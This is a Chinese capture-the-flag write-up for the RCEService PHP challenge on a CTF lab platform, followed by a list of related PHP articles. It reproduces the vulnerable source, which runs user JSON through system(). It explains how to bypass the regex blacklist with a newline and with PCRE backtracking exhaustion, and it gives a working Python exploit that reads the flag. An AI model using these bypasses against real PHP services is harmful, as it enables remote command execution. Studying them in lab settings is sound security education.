PHP试题之RCEService正则回溯解答
打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>看到最后的system以及正则,看来这题是要绕过正则执行cmd命令了,这么多黑名单函数应该不会让我们找漏网之鱼吧,不会吧不会吧
我们看到正则表达式没有添加修饰符,那我们可以利用多行匹配这个漏洞了
在这里我们可以利用%0a换行符进行绕过正则匹配,而且可以看到要有修饰符s才会让.*匹配换行符,因此我们这里可以利用我们之前的ls试试能不能成功
发现依然可以出来index.php;源代码中编译了环境变量path(我以为只是单纯暗示我们这个目录),我们就在那个目录下看看
发现了flag文件,我用nl,cat,more,less等命令都读取不出来 ,查资料发现,系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令
因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面
第二种办法也就是正则表达式回溯过多导致false,说实话我还是第一次听到正则的回溯问题
简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了,导致表达式后面的式子没有地方匹配,因此一个一个字符吐出来,直到后面的式子全部匹配完毕或者回溯次数过多
例子
经过自己试试果然只能回溯一百万次
'/^.*
正则表达式最前面的匹配字符,^代表首个字母,'.'代表除换行符之外的所有字符,*代表前面那个表达式重复执行多次,因此他这里直接把我们的payload全部匹配完毕,导致后面的匹配不到字符了,只能一个个回溯
再将后面的匹配一下字符,可以发现目前写的小写字母都没有过滤掉,因为十六进制\x00-\x1f换算成十进制并没有到小写字母的ascii值那个地方,因此我们可以任意利用一个小写字母×个一百万次,就可以让正则表达式直接失败
import requests
url='http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'
data={
'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)以上就是PHP试题之RCEService正则回溯解答的详细内容,更多关于PHP试题RCEService正则回溯的资料请关注脚本之家其它相关文章!
相关文章
这篇文章主要介绍了PHP如何操作数据库,文中的实例代码讲解非常详细,感兴趣的小伙伴可以参考阅读2023-04-04
这篇文章我们给大家一个完整的通过php获取手机端的号码以及ip地址实例代码,需要的朋友们可以测试参考下。2018-09-09
这篇文章主要介绍了PHP实现负载均衡的加权轮询方法,简单描述了常见的负载均衡算法,并结合实例形式分析了加权轮询的相关实现技巧,需要的朋友可以参考下2018-08-08
这篇文章主要介绍了php数组指针函数功能及用法,结合实例形式分析了PHP数组指针函数reset(),prev(),current(),next(),end(),key(),each()的功能、用法及针对数组键值相关操作技巧,需要的朋友可以参考下2020-02-02
以下是对php中如何判断一个网页请求是ajax请求还是普通请求的实现方法进行了详细的分析介绍,需要的朋友可以过来参考下2013-08-08
在IE中下载附件之前要清空缓存、中文文件名要用urlencode编码,下面有个不错的示例,需要的朋友可以参考下2014-01-01
这篇文章主要介绍了php基于GD库画五星红旗的方法,涉及php操作GD库及数组的使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下2015-02-02
ThinkPHP6使用最新版本Endroid/QrCode生成二维码的方法实例
这篇文章主要介绍了ThinkPHP6使用最新版本Endroid/QrCode生成二维码的方法,结合实例形式详细分析了ThinkPHP6使用最新版本Endroid/QrCode生成二维码具体步骤、原理、实现方法与相关注意事项,需要的朋友可以参考下2023-07-07
大部分PHP代码执行时间都不会很久。但是有些时候,比如等待图片上传,可能执行时间过长导致超时。2011-07-07
康盛的 authcode 函数可以说对中国的PHP界作出了重大贡献。包括康盛自己的产品,以及大部分中国使用PHP的公司都用这个函数进行加密,authcode 是使用异或运算进行加密和解密。2010-02-02
最新评论